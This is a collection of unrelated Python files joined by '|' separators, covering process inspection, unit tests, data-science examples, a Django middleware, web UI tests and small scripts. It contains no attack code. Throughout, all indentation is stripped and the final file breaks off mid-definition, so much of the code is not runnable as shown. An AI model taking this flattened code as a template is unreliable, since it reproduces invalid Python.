if len(unpack) == 2:
seconds += int(unpack[0]) * 86400
unpack = unpack[1]
else:
unpack = unpack[0]
unpack = unpack.split(':')
mult = 1.0
for k in range(len(unpack), 0, -1):
seconds += float(unpack[k-1]) * mult
mult *= 60
return seconds
class ProcessHandlePs(ProcessHandle, ProcessHandleParserBase):
ATTRS = [ 'user', 'pid', 'ppid', 'pcpu', 'rss', 'vsz', 'stat', 'etime', 'time', 'comm' ]
TYPE_MAP = {
'user': '%s', 'pid': '%d', 'ppid': '%d', 'pcpu': '%f', 'rss': '%d', 'vsz': '%d', 'stat': '%s',
'etime': '%s', 'time': '%s', 'comm': '%s'
}
HANDLERS = {
'rss': ProcessHandlersPs.handle_mem,
'vsz': ProcessHandlersPs.handle_mem,
'etime': ProcessHandlersPs.handle_elapsed, # [[dd-]hh:]mm:ss.ds
'time': ProcessHandlersPs.handle_elapsed, # [[dd-]hh:]mm:ss.ds
}
ALIASES = {
'starttime': 'etime',
}
def _get_process_attrs(self, attrs):
try:
data = os.popen('ps -p %s -o %s' % (self._pid, ','.join(attrs))).readlines()
if len(data) > 1:
return data[-1]
except:
return None
def _produce(self):
return self._get_process_attrs(ProcessHandlePs.ATTRS)
def cpu_time(self):
return self.get('time') or 0.0
def wall_time(self):
return self.get('starttime') or 0.0
def pid(self):
return self.get('pid')
def ppid(self):
return self.get('ppid')
def user(self):
return self.get('user')
def cwd(self):
try:
lsof = subprocess.Popen(('lsof -a -p %s -d cwd -Fn' % self.pid()).split(),
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, _ = lsof.communicate()
for line in stdout.split('\n'):
if line.startswith('n'):
return line[1:]
except OSError:
return None
def cmdline(self):
# 'comm' is just the base cmd, this returns the cmd with all the arguments.
# We don't read 'command' on the initial ps call, because the result contains spaces, and
# our scanf-like parsing code won't read it. This isn't a performance issue in current usage.
return self._get_process_attrs(['command']).strip()
|
import unittest
import calculate
def run_test(control_dist):
test = calculate.calc(control_dist)
if test == -1:
return -1
start = test[0].format("MM.DD.YYYY HH:mm")
finish = test[1].format("MM.DD.YYYY HH:mm")
return [start, finish]
class TestBrevetCalculator(unittest.TestCase):
## This tests the opening_times function, without special cases
def test_opening_times(self):
self.assertEqual(calculate.get_opening_time(0), '00:00')
self.assertEqual(calculate.get_opening_time(1), '00:02')
self.assertEqual(calculate.get_opening_time(200), '05:53')
self.assertEqual(calculate.get_opening_time(400), '12:08')
self.assertEqual(calculate.get_opening_time(599), '18:46')
self.assertEqual(calculate.get_opening_time(600), '18:48')
self.assertEqual(calculate.get_opening_time(601), '18:50')
self.assertEqual(calculate.get_opening_time(999), '33:03')
self.assertEqual(calculate.get_opening_time(1000), '33:05')
## This tests the closing_times function, without special cases
def test_closing_times(self):
self.assertEqual(calculate.get_closing_time(0), '01:00')
self.assertEqual(calculate.get_closing_time(1), '00:04')
self.assertEqual(calculate.get_closing_time(200), '13:20')
self.assertEqual(calculate.get_closing_time(400), '26:40')
self.assertEqual(calculate.get_closing_time(599), '39:56')
self.assertEqual(calculate.get_closing_time(600), '40:00')
self.assertEqual(calculate.get_closing_time(601), '40:05')
self.assertEqual(calculate.get_closing_time(999), '74:55')
self.assertEqual(calculate.get_closing_time(1000), '75:00')
####
# The following tests are verifying the calc function in calculate.py with
# special cases
####
def test_brevet_200(self):
calculate.brevet = 200
times = run_test(0)
self.assertEqual(times[0], "01.01.2000 00:00")
self.assertEqual(times[1], "01.01.2000 01:00")
times = run_test(1)
self.assertEqual(times[0], "01.01.2000 00:02")
self.assertEqual(times[1], "01.01.2000 00:04")
times = run_test(199)
self.assertEqual(times[0], "01.01.2000 05:51")
self.assertEqual(times[1], "01.01.2000 13:16")
times = run_test(200)
self.assertEqual(times[0], "01.01.2000 05:53")
self.assertEqual(times[1], "01.01.2000 13:30")
times = run_test(201)
self.assertEqual(times[0], "01.01.2000 05:53")
self.assertEqual(times[1], "01.01.2000 13:30")
times = run_test(221)
self.assertEqual(times, -1)
def test_brevet_300(self):
calculate.brevet = 300
times = run_test(200)
self.assertEqual(times[0], "01.01.2000 05:53")
self.assertEqual(times[1], "01.01.2000 13:20")
times = run_test(299)
self.assertEqual(times[0], "01.01.2000 08:59")
self.assertEqual(times[1], "01.01.2000 19:56")
times = run_test(300)
self.assertEqual(times[0], "01.01.2000 09:00")
self.assertEqual(times[1], "01.01.2000 20:00")
times = run_test(301)
self.assertEqual(times[0], "01.01.2000 09:00")
self.assertEqual(times[1], "01.01.2000 20:00")
times = run_test(331)
self.assertEqual(times, -1)
def test_brevet_400(self):
calculate.brevet = 400
times = run_test(300)
self.assertEqual(times[0], "01.01.2000 09:00")
self.assertEqual(times[1], "01.01.2000 20:00")
times = run_test(399)
self.assertEqual(times[0], "01.01.2000 12:06")
self.assertEqual(times[1], "01.02.2000 02:36")
times = run_test(400)
self.assertEqual(times[0], "01.01.2000 12:08")
self.assertEqual(times[1], "01.02.2000 03:00")
times = run_test(440)
self.assertEqual(times[0], "01.01.2000 12:08")
self.assertEqual(times[1], "01.02.2000 03:00")
times = run_test(441)
self.assertEqual(times, -1)
def test_brevet_600(self):
calculate.brevet = 600
times = run_test(400)
self.assertEqual(times[0], "01.01.2000 12:08")
self.assertEqual(times[1], "01.02.2000 02:40")
times = run_test(599)
self.assertEqual(times[0], "01.01.2000 18:46")
self.assertEqual(times[1], "01.02.2000 15:56")
times = run_test(600)
self.assertEqual(times[0], "01.01.2000 18:48")
self.assertEqual(times[1], "01.02.2000 16:00")
times = run_test(660)
self.assertEqual(times[0], "01.01.2000 18:48")
self.assertEqual(times[1], "01.02.2000 16:00")
times = run_test(661)
self.assertEqual(times, -1)
def test_brevet_1000(self):
calculate.brevet = 1000
times = run_test(600)
self.assertEqual(times[0], "01.01.2000 18:48")
self.assertEqual(times[1], "01.02.2000 16:00")
times = run_test(999)
self.assertEqual(times[0], "01.02.2000 09:03")
self.assertEqual(times[1], "01.04.2000 02:55")
times = run_test(1000)
self.assertEqual(times[0], "01.02.2000 09:05")
self.assertEqual(times[1], "01.04.2000 03:00")
times = run_test(1100)
self.assertEqual(times[0], "01.02.2000 09:05")
self.assertEqual(times[1], "01.04.2000 03:00")
times = run_test(1101)
self.assertEqual(times, -1)
if __name__ == '__main__':
unittest.main()
|
#一:使用Python中的urllib类中的urlretrieve()函数,直接从网上下载资源到本地
import os, stat
import urllib.request
img_url = "http://img1.bdstatic.com/img/image/shitu/feimg/uploading.gif"
file_path = 'D:/book/img'
file_name = "233"
try:
# 是否有这个路径
if not os.path.exists(file_path):
# 创建路径
os.makedirs(file_path)
# 获得图片后缀
file_suffix = os.path.splitext(img_url)[1]
print(file_suffix)
# 拼接图片名(包含路径)
filename = '{}{}{}{}'.format(file_path,os.sep,file_name, file_suffix)
print(filename)
# 下载图片,并保存到文件夹中
urllib.request.urlretrieve(img_url, filename=filename)
except IOError as e:
print("IOError")
except Exception as e:
print("Exception")
#二:利用读写操作写入文件
"""
import os,stat
import urllib.request
for i in range(1,3):
if not os.path.exists("./rym"):
print("不存在")
os.makedirs("./rym")
else:
print("存在")
os.chmod("D:/imagss",777)
with urllib.request.urlopen("https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1516371301&di=d99af0828b"
"b301fea27c2149a7070d44&imgtype=jpg&er=1&src=http%3A%2F%2Fupload.qianhuaweb.com%2F2017%2F0718%"
"2F1500369506683.jpg", timeout=30) as response, open("./rym/lyj.png"
, 'wb') as f_save:
f_save.write(response.read())
f_save.flush()
f_save.close()
print("成功")
"""
|
"""
============
Moving Digit (Experimental - Hierarchical SFA)
============
An example of :class:`sksfa.HSFA` applied to a simple image time-series:
a one-digit version of the moving MNIST dataset. Each data point is 4096-dimensional.
.. image:: ../images/moving_mnist.gif
:align: center
If the change in x is not significantly faster or slower than the change in y, HSFA with only two output features
successfully extracts a smooth (and possibly flipped) representation of the position of the digit in the image.
Ground truth is only added for the comparison, not during training.
(Note that a problem like this can also be solved with linear SFA. This example serves the purpose of providing an
example on how an HSFA network is initialized and how it can be directly applied to image data without flattening.)
"""
import numpy as np
from sksfa import HSFA
import matplotlib.pyplot as plt
import os
# Loading and preparing the data
# - HSFA requires a colorchannel, even for grayscale images
split_ratio = 0.7
data = np.load("data/mmnist_data.npy").squeeze()[..., None]
ground_truth = np.load("data/mmnist_positions.npy").squeeze()
n_points = data.shape[0]
split_idx = int(split_ratio * n_points)
training_data = data[:split_idx]
training_gt = ground_truth[:split_idx]
test_data = data[split_idx:]
test_gt = ground_truth[split_idx:]
# Preparing the HSFA-network:
# - each layer needs a 6-tuple for configuration
# - each 6-tuple contains (kernel_width, kernel_height, stride_width, stride_height, n_features, expansion_degree)
# The final layer will always be a full connected SFA layer
layer_configurations = [(8, 8, 8, 8, 8, 1),
(2, 2, 2, 2, 8, 2)]
hsfa = HSFA(n_components=2,
input_shape=data.shape[1:],
layer_configurations=layer_configurations,
internal_batch_size=100,
noise_std=0.01)
hsfa.summary()
hsfa.fit(training_data)
output = hsfa.transform(test_data)
gt_delta = np.var(test_gt[1:] - test_gt[:-1], axis=0)
gt_order = np.argsort(gt_delta)
gt_labels = ["x", "y"]
fig, ax = plt.subplots(2, 2, sharex=True)
cutoff = 60
ax[0, 0].plot(output[:cutoff, 0])
ax[1, 0].plot(output[:cutoff, 1])
ax[0, 1].plot(test_gt[:cutoff, gt_order[0]])
ax[1, 1].plot(test_gt[:cutoff, gt_order[1]])
ax[0, 0].set_title("Extracted features")
ax[0, 1].set_title("True position")
plt.tight_layout()
plt.show()
|
"""Advent of Code Day 9 - Marble Mania"""
import collections
def marble_game(num_players, num_marbles):
"""Play a game of marbles and return the winning score."""
circle = collections.deque([0])
scores = collections.defaultdict(int)
player = 1
for marble in range(1, num_marbles + 1):
if marble % 23 == 0:
player = player % num_players
circle.rotate(7)
scores[player] += circle.pop() + marble
circle.rotate(-1)
else:
circle.rotate(-1)
circle.append(marble)
player += 1
return max(scores.values())
# Answer One
print("Small game:", marble_game(465, 71940))
# Answer Two
print("Large game:", marble_game(465, 7194000)) |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from dtest import util as dtutil
import test_servers
import utils
class ServerMetaTest(test_servers.BaseServerTest):
"""Test that the server metadata API works as expected."""
def test_list(self):
"""Test that we can retrieve metadata for a server."""
# Get a pristine server object
s = self.os.servers.get(self.server)
# Make sure that we have metadata for this server
dtutil.assert_not_equal(len(s.metadata), 0)
# Verify that our metadata key is in there
dtutil.assert_true(self.meta_key in s.metadata)
# Verify that it has the value we expect
dtutil.assert_equal(s.metadata[self.meta_key], self.meta_data)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import http.client
import urllib
import json
from constants import HOST, PORT
dest = ':'.join([HOST, PORT])
def getBotResponse(response):
'''
Parse Json response from server
response - JSON formated server response
return - actual string response from server
'''
response_py = json.loads(response)
return response_py['response']
def client():
# set up connectin with server
connection = http.client.HTTPConnection(dest)
while(1):
user_input = None
try:
user_input = input('user: ')
except EOFError:
break
url_encoded_input = urllib.parse.quote(user_input)
request_path = ''.join(['askmeanything/?q=', url_encoded_input])
# send a request to server
connection.request('get', request_path)
# read the response
response = connection.getresponse()
print(getBotResponse(response.read().decode()))
print("Conversation ended")
if __name__ == "__main__":
client()
|
# -*- coding: utf-8 -*-
# for python3
#
# いろいろ学習する
# python training.py {m} {pcsv} {ncsv} {pdump}
# m : 'p'=パーセプトロン, 'a'=AdaBoost+パーセプトロン, 's'=SVM
# pcsv : 正例のCSVファイル名
# ncsv : 負例のCSVファイル名
# pdump : 学習後のパラメータ
#
# python chk_training.py {m} {pcsv} {ncsv} {pdump}
# として実行すると、学習後のパラメータを入力して検証する
import os
import sys
import train_cls
import percep_cls
import ab_percep_cls
import svm_cls
mode = 1
if os.path.basename(sys.argv[0]) == 'chk_training.py':
mode = 2
method = sys.argv[1]
posi_file = sys.argv[2]
nega_file = sys.argv[3]
param_file = sys.argv[4]
print("mode=%d method=%s" % (mode, method))
if method == 'p':
perceptron = percep_cls.Perceptron()
training = train_cls.Training(perceptron)
if mode == 1:
training.training(posi_file, nega_file, param_file)
else:
training.check(posi_file, nega_file, param_file)
elif method == 'a':
ab_perceptron = ab_percep_cls.AB_Perceptron()
training = train_cls.Training(ab_perceptron)
if mode == 1:
training.training(posi_file, nega_file, param_file)
else:
training.check(posi_file, nega_file, param_file)
elif method == 's':
svm = svm_cls.SVM()
training = train_cls.Training(svm)
if mode == 1:
training.training(posi_file, nega_file, param_file)
else:
training.check(posi_file, nega_file, param_file)
|
#!/usr/bin/python
#\file find_changept.py
#\brief Find a change point of a function.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Mar.27, 2021
import scipy.optimize
'''
Find a change point of a function.
Assume a function func(x)={True,False} which has only one change point x0
where func(x)=True if x<x0 else False.
We try to find x0.
'''
if __name__=='__main__':
def func(x):
return True if x>0.5 else False
bounds= [0.0,1.0]
#Auxiliary function to convert func to a minimization problem.
def func_opt(x):
return (x-bounds[0])/(bounds[1]-bounds[0]) if func(x)==True and x>=bounds[0] else 1.0
#res= scipy.optimize.golden(func_opt, brack=bound, tol=1e-06, maxiter=1000)
res= scipy.optimize.minimize_scalar(func_opt, bounds=bounds, method='bounded', options={'xatol': 1e-05, 'maxiter': 500})
print res
print res.x, func(res.x), func_opt(res.x), func_opt(1), func_opt(0), func_opt(0.55)
|
"""
תשע"ה מועד א' שאלה 1
"""
import numpy as np
from numpy import random as rn
import matplotlib.pyplot as plt
s=0.35
c=1
M=50000
T=2
N=200
dw1=rn.randn(M,N)
X0=-1+2*rn.rand(M)
h=T/N
X=np.ones((M,N+1))
X[:,0]=X0
for i in range(0,N):
X[:,i+1]=X[:,i]-c*X[:,i]*h*(X[:,i]**2-1)+s*dw1[:,i]*np.sqrt(h)/(1+X[:,i]**2)
EX=np.mean(X[:,-1])
VX=np.var(X[:,-1])
print("EX2=",EX)
print("VX2=",VX)
plt.hist(X[:,-1],bins=1000, normed=1)
plt.show()
|
"""
tests for {{cookiecutter.package_name}}
"""
|
import logging
from django.contrib.auth.models import AnonymousUser
from django.utils.deprecation import MiddlewareMixin
from rest_framework.request import Request
from rest_framework_simplejwt.authentication import JWTAuthentication
from project_management.models import ProjectUser
from site_manage.models import SiteUser
from user.models import UserOrganisation
# request_logger = logging.getLogger('django.request')
request_logger = logging.getLogger(__name__)
class AssignSiteAndProject(MiddlewareMixin):
"""Request Logging Middleware."""
def process_request(self, request, *args, **kwargs):
user = self.__get_user_jwt(request)
if not user or user.is_anonymous:
request.project = None
request.organisation = None
request.site = None
return None
request.project = self._get_project(user)
request.organisation = self.__get_organisation(user)
request.site = self.__get_site(user)
def _get_project(self, user):
return getattr(ProjectUser.objects.filter(user=user).first(), 'project', None)
def __get_organisation(self, user):
return getattr(UserOrganisation.objects.filter(user=user).first(), 'organization', None)
def __get_site(self, user):
return getattr(SiteUser.objects.filter(user=user).first(), 'site', None)
def __get_user_jwt(self, request):
"""
Replacement for django session auth get_user & auth.get_user
JSON Web Token authentication. Inspects the token for the user_id,
attempts to get that user from the DB & assigns the user on the
request object. Otherwise it defaults to AnonymousUser.
This will work with existing decorators like LoginRequired ;)
Returns: instance of user object or AnonymousUser object
"""
user = None
try:
user_jwt = JWTAuthentication().authenticate(Request(request))
if user_jwt is not None:
# store the first part from the tuple (user, obj)
user = user_jwt[0]
except:
pass
return user or AnonymousUser()
|
from .compile import CompileCodeResource
|
import pytest
import requests
import transaction
from datetime import datetime, timedelta
from onegov.core.utils import module_path
from onegov.directory import DirectoryCollection
from onegov.file import FileCollection
from onegov.people import Person
from tests.shared.utils import create_image
from pytz import UTC
from sedate import utcnow
from tempfile import NamedTemporaryFile
from time import sleep
from tests.shared.utils import encode_map_value
from onegov.org.models import ResourceRecipientCollection
import os
from pathlib import Path
from onegov.reservation import ResourceCollection
from onegov.ticket import TicketCollection
from tests.onegov.org.test_views_resources import add_reservation
def test_browse_activities(browser):
# admins
browser.login_admin()
browser.visit('/timeline')
assert browser.is_text_present("Noch keine Aktivität")
# anonymous
browser.logout()
browser.visit(
'/timeline', expected_errors=[{'rgxp': '/timeline - Failed'}]
)
assert not browser.is_text_present("Noch keine Aktivität")
@pytest.mark.parametrize("field", (
'Photo = *.png|*.jpg',
'Photo *= *.png|*.jpg',
))
def test_browse_directory_uploads(browser, org_app, field):
DirectoryCollection(org_app.session(), type='extended').add(
title="Crime Scenes",
structure="""
Name *= ___
Description *= ...
{field}
""".format(field=field),
configuration="""
title:
- name
order:
- name
display:
content:
- name
- description
- photo
""",
type='extended'
)
transaction.commit()
# create a new page with a picture
photo = create_image(output=NamedTemporaryFile(suffix='.png'))
browser.login_admin()
browser.visit('/directories/crime-scenes/+new')
browser.fill('name', "Seven Seas Motel")
browser.fill('description', "First victim of Ice Truck Killer")
browser.fill('photo', photo.name)
browser.find_by_value("Absenden").click()
assert browser.is_text_present("Seven Seas Motel")
assert browser.is_element_present_by_css('.field-display img')
src = browser.find_by_css('.field-display img')['src']
# elect to keep the picture (default)
browser.find_by_css('.edit-link').click()
browser.fill('name', "Seven Seas Motel, Miami")
browser.find_by_value("Absenden").click()
assert browser.is_text_present("Seven Seas Motel, Miami")
assert browser.is_element_present_by_css('.field-display img')
assert browser.find_by_css('.field-display img')['src'] == src
# elect to replace the picture
photo = create_image(output=NamedTemporaryFile(suffix='.png'))
browser.find_by_css('.edit-link').click()
browser.choose('photo', 'replace')
browser.find_by_name('photo')[3].value = photo.name
browser.find_by_value("Absenden").click()
assert browser.is_element_present_by_css('.field-display img')
assert browser.find_by_css('.field-display img')['src'] != src
# elect to delete the picture
browser.find_by_css('.edit-link').click()
browser.choose('photo', 'delete')
browser.find_by_value("Absenden").click()
if field.startswith('Photo ='):
assert not browser.is_element_present_by_css('.field-display img')
else:
assert browser.is_text_present("Dieses Feld wird benötigt")
def test_upload_image_with_error(browser, org_app):
DirectoryCollection(org_app.session(), type='extended').add(
title="Crime Scenes",
structure="""
Name *= ___
Description *= ...
Photo = *.jpg|*.png
""",
configuration="""
title:
- name
order:
- name
display:
content:
- name
- description
- photo
""",
type='extended'
)
transaction.commit()
# create a new page with a missing field (but do supply the picture)
photo = create_image(output=NamedTemporaryFile(suffix='.png'))
browser.login_admin()
browser.visit('/directories/crime-scenes/+new')
browser.fill('name', "Seven Seas Motel")
browser.fill('photo', photo.name)
browser.find_by_value("Absenden").click()
assert browser.is_text_present("Dieses Feld wird benötigt")
# try again with the missing field present
browser.fill('description', "First victim of Ice Truck Killer")
browser.find_by_value("Absenden").click()
assert browser.is_text_present("Seven Seas Motel")
# the image won't be there however (it gets cleared in between requests)
assert not browser.is_element_present_by_css('.field-display img')
@pytest.mark.skip('Picture upload is needed to check scaling')
def test_directory_thumbnail_views(browser, org_app):
DirectoryCollection(org_app.session(), type='extended').add(
title="Jam Session",
structure="""
Name *= ___
Photo = *.jpg|*.png
Instruments = *.jpg|*.png
""",
configuration="""
title:
- name
order:
- name
display:
content:
- name
- instruments
- photo
show_as_thumbnails:
- photo
""",
type='extended'
)
transaction.commit()
browser.login_admin()
browser.visit('/directories/jam-session/+new')
photo = create_image(output=NamedTemporaryFile(suffix='.png'))
browser.fill('name', 'Bar59')
browser.fill('photo', photo.name)
browser.fill('instruments', photo.name)
browser.find_by_value("Absenden").click()
@pytest.mark.skip("Passes locally, but not in CI, skip for now")
def test_browse_directory_editor(browser, org_app):
browser.login_admin()
browser.visit('/directories/+new')
assert browser.is_element_present_by_css('.formcode-toolbar', wait_time=5)
browser.fill('title', "Restaurants")
# add a title through the dropdown menu
browser.find_by_css('.formcode-toolbar-element').scroll_to()
browser.find_by_css('.formcode-toolbar-element').click()
browser.find_by_css('.formcode-snippet-name')[0].scroll_to()
browser.find_by_css('.formcode-snippet-name')[0].click()
# add a text through the dropdown menu
browser.find_by_css('.formcode-toolbar-element').scroll_to()
browser.find_by_css('.formcode-toolbar-element').click()
sleep(.25)
browser.find_by_css('.formcode-snippet-name')[1].scroll_to()
browser.find_by_css('.formcode-snippet-name')[1].mouse_over()
sleep(.25)
browser.find_by_css('.formcode-snippet-required')[0].scroll_to()
browser.find_by_css('.formcode-snippet-required')[0].click()
assert browser.find_by_css('#structure').value == (
"# Titel\n"
"Text *= ___\n"
)
# Add the title to the title format
browser.scroll_to_css('#title_format')
assert browser.is_element_present_by_xpath(
'(//div[@class="formcode-toolbar-element"])[2]', wait_time=5)
browser.find_by_css('.formcode-toolbar-element')[1].click()
browser.find_by_css('.formcode-snippet-name')[0].click()
assert browser.find_by_css('#title_format').value == '[Titel/Text]'
# Add it to the lead format as well
browser.scroll_to_css('#lead_format')
assert browser.is_element_present_by_xpath(
'(//div[@class="formcode-toolbar-element"])[3]', wait_time=5)
browser.find_by_css('.formcode-toolbar-element')[2].click()
browser.find_by_css('.formcode-snippet-name')[0].click()
assert browser.find_by_css('#lead_format').value == '[Titel/Text]'
# Elect to show the fields in the main view
browser.find_by_css('.formcode-select label').click()
assert browser.find_by_css('#content_fields').value == "Titel/Text"
# Save the form and ensure that after the load we get the same selections
submit = browser.find_by_value("Absenden")
submit.scroll_to()
submit.click()
browser.find_by_css('.edit-link').click()
assert browser.find_by_css('.formcode-select input')[0].checked
assert not browser.find_by_css('.formcode-select input')[1].checked
def test_browse_directory_coordinates(browser, org_app):
DirectoryCollection(org_app.session(), type='extended').add(
title="Restaurants",
structure="""
Name *= ___
Tables = 0..1000
""",
configuration="""
title: '[name]'
lead: 'Offers [tables] tables'
order:
- name
display:
content:
- name
""",
meta={
'enable_map': 'everywhere'
},
type='extended'
)
transaction.commit()
# create two restaurants with two different coordinates
browser.login_admin()
browser.visit('/directories/restaurants/+new')
browser.fill('name', "City Wok")
browser.fill('tables', "10")
assert browser.is_element_present_by_css('.add-point-active', wait_time=5)
browser.execute_script('document.leafletmaps[0].panBy([-100, 100]);')
browser.find_by_css('.add-point-active').click()
browser.find_by_value("Absenden").click()
browser.visit('/directories/restaurants/+new')
browser.fill('name', "City Sushi")
browser.fill('tables', "20")
assert browser.is_element_present_by_css('.add-point-active', wait_time=5)
browser.execute_script('document.leafletmaps[0].panBy([100, -100]);')
browser.find_by_css('.add-point-active').click()
browser.find_by_value("Absenden").click()
# make sure the restaurants are visible in the overview
browser.visit('/directories/restaurants')
assert "Offers 20 tables" in browser.html
assert "Offers 10 tables" in browser.html
# as well as their points, which we can toggle
assert not browser.is_element_present_by_css('.popup-title')
assert not browser.is_element_present_by_css('.popup-lead')
browser.find_by_css('.vector-marker')[1].click()
assert browser.is_element_present_by_css('.popup-title')
assert browser.is_element_present_by_css('.popup-lead')
# the popup leads us to the restaurant
browser.find_by_css('.popup-title').click()
assert browser.is_element_present_by_id(
'page-directories-restaurants-city-wok')
def test_publication_workflow(browser, temporary_path, org_app):
path = temporary_path / 'foo.txt'
with path.open('w') as f:
f.write('bar')
browser.login_admin()
browser.visit('/files')
# upload a file
assert not browser.is_text_present("Soeben hochgeladen")
browser.drop_file('.upload-dropzone', path)
assert browser.is_text_present("Soeben hochgeladen")
# show the details
browser.find_by_css('.upload-filelist .untoggled').click()
assert browser.is_text_present("Öffentlich")
assert not browser.is_text_present("Privat")
assert not browser.is_text_present("Publikationsdatum")
# make sure the file can be downloaded
file_url = browser.find_by_css('.file-preview')['href']
r = requests.get(file_url)
assert r.status_code == 200
assert 'public' in r.headers['cache-control']
# make sure unpublishing works
browser.find_by_css('.publication .file-status-tag a').click()
r = requests.get(file_url)
assert r.status_code == 403
assert browser.is_text_present("Privat", wait_time=1)
assert browser.is_text_present("Publikationsdatum")
assert not browser.is_text_present("Öffentlich")
# enter a publication date in the past (no type date support in selenium)
# set as the time of the layout timezone. UTC date can be a day before
browser.find_by_name('hour').select('00:00')
assert browser.is_text_present("Wird publiziert am", wait_time=1)
assert not browser.is_text_present("Publikationsdatum")
f = FileCollection(org_app.session()).query().one()
dt = datetime.today()
midnight = datetime(dt.year, dt.month, dt.day, 0, tzinfo=UTC)
assert f.publish_date in (
midnight, # utc
midnight - timedelta(hours=1), # +1:00 winter, Europe
midnight - timedelta(hours=2) # +2:00 summer, Europa
)
# run the cronjob and make sure it works
job = org_app.config.cronjob_registry.cronjobs['hourly_maintenance_tasks']
job.app = org_app
job_url = f'{browser.url.replace("/files", "")}/cronjobs/{job.id}'
requests.get(job_url)
sleep(0.1)
r = requests.get(file_url)
assert r.status_code == 200
assert 'public' in r.headers['cache-control']
def test_signature_workflow(browser, temporary_path, org_app):
path = module_path('tests.onegov.org', 'fixtures/sample.pdf')
org_app.enable_yubikey = True
# upload the pdf
browser.login_admin()
browser.visit('/files')
browser.drop_file('.upload-dropzone', path)
assert browser.is_text_present("Soeben hochgeladen")
# show the details
browser.find_by_css('.upload-filelist .untoggled').click()
assert browser.is_text_present("Ohne digitales Siegel")
# try to sign the pdf (this won't work in this test-environment due to
# it being in a different process, but we should see the error handling)
browser.find_by_css('a.is-not-signed').click()
assert browser.is_text_present("Bitte geben Sie Ihren Yubikey ein")
assert browser.is_text_present("Signieren")
browser.find_by_css('.dialog input').fill('foobar')
browser.find_by_text("Signieren").click()
assert browser.is_text_present("nicht mit einem Yubikey verknüpft")
# change the database and show the information in the browser
f = FileCollection(org_app.session()).query().one()
f.signed = True
f.signature_metadata = {
'signee': 'foo@example.org',
'timestamp': utcnow().isoformat()
}
transaction.commit()
# make sure the signature information is shown
browser.visit('/files')
browser.find_by_css('.untoggled').click()
assert browser.is_text_present('foo@example.org')
assert browser.is_text_present('Digitales Siegel angewendet')
def test_external_map_link(browser, client):
client.login_admin()
settings = client.get('/map-settings')
settings.form['geo_provider'] = 'geo-bs'
settings.form.submit()
topic = client.get('/topics/themen')
topic = topic.click('Bearbeiten')
topic.form['coordinates'] = encode_map_value({
'lat': 47, 'lon': 8, 'zoom': 12
})
topic.form.submit()
browser.visit('/topics/themen')
browser.find_by_css(".button-state").click()
assert browser.is_text_present("Karte Geo-BS")
@pytest.mark.flaky(reruns=3)
def test_context_specific_function_are_displayed_in_person_directory(browser,
client):
browser.login_admin()
client.login_admin()
browser.visit('/people/new')
browser.fill_form({
'first_name': 'Berry',
'last_name': 'Boolean'
})
browser.find_by_value("Absenden").click()
person = client.app.session().query(Person)\
.filter(Person.last_name == 'Boolean')\
.one()
browser.visit('/editor/new/page/1')
browser.fill_form({
'title': 'All About Berry',
'people_' + person.id.hex: True,
'people_' + person.id.hex + '_function': 'Logician'
})
browser.find_by_value("Absenden").click()
browser.visit(f"/person/{person.id.hex}")
browser.find_by_text('All About Berry: Logician')
def test_rejected_reservation_sends_email_to_configured_recipients(browser,
client):
resources = ResourceCollection(client.app.libres_context)
dailypass = resources.add('Dailypass', 'Europe/Zurich', type='daypass')
recipients = ResourceRecipientCollection(client.app.session())
recipients.add(
name='John',
medium='email',
address='john@example.org',
rejected_reservations=True,
resources=[
dailypass.id.hex,
]
)
add_reservation(
dailypass, client, datetime(2017, 1, 6, 12), datetime(2017, 1, 6, 16))
transaction.commit()
tickets = TicketCollection(client.app.session())
assert tickets.query().count() == 1
browser.login_admin()
browser.visit('/tickets/ALL/open')
browser.find_by_value("Annehmen").click()
def is_advanced_dropdown_present():
e = [e for e in browser.find_by_tag("button") if 'Erweitert' in e.text]
return len(e) == 1
browser.wait_for(
lambda: is_advanced_dropdown_present(),
timeout=5,
)
advanced_menu_options = browser.find_by_tag("button")
next(e for e in advanced_menu_options if 'Erweitert' in e.text).click()
browser.wait_for(
lambda: browser.is_element_present_by_xpath(
'//a['
'@data-confirm="Möchten Sie diese Reservation wirklich absagen?"]'
),
timeout=5,
)
reject_reservation = browser.find_by_xpath(
'//a[@data-confirm="Möchten Sie diese Reservation wirklich absagen?"]'
)[0]
reject_reservation.click()
# confirm dialog
browser.find_by_value("Reservation absagen").click()
assert browser.is_text_present("Die Reservation wurde abgelehnt")
assert len(os.listdir(client.app.maildir)) == 1
mail = Path(client.app.maildir) / os.listdir(client.app.maildir)[0]
with open(mail, 'r') as file:
mail_content = file.read()
assert (
"Die folgenden Reservationen mussten leider abgesagt werden:"
in mail_content
)
|
a = float(input('请输入华氏温度:'))
b = (a - 32) / 1.8
print('华氏温度%.1f = 摄氏温度为%.1f' % (a, b)) |
from flask import render_template
import re
import json
from .. import db
from ..work import views
from ..models import Comment
def add_comment(json, comment):
if 'user_id' in json:
comment.user_id = json['user_id']
if 'parent_id' in json:
parent_comment = Comment.query.filter_by(id = json['parent_id']).first()
parent_comment.comments.append(comment)
db.session.add(parent_comment)
db.session.add(comment)
db.session.commit()
return comment.id
def add_reply(json):
comment = Comment(text=json['text'])
return add_comment(json, comment)
def add_comment_to_bookmark(json):
comment = Comment(text=json['text'])
comment.bookmark_id = json['bookmark_id']
return add_comment(json, comment)
def add_comment_to_chapter(json):
comment = Comment(text=json['text'])
comment.chapter_id = json['chapter_id']
return add_comment(json, comment)
def delete_comment(comment_id, user_id, admin_override=False):
comment = Comment.query.filter_by(id=comment_id).first()
if comment.user_id != user_id and admin_override == False:
return
if comment is not None and comment.parent_comment != []:
parent = comment.parent_comment
comment.parent_comment[0].replies.remove(comment)
elif comment is not None:
comment.replies = []
Comment.query.filter_by(id=comment_id).delete()
db.session.commit() |
from ...config import params
from collections import deque
import random
import numpy as np
from ..update_strategy.normalDQN import normalStrategy
class NormalStrategy:
def __init__(self, ):
self.memory = deque()
self.noram = normalStrategy()
def getLength(self):
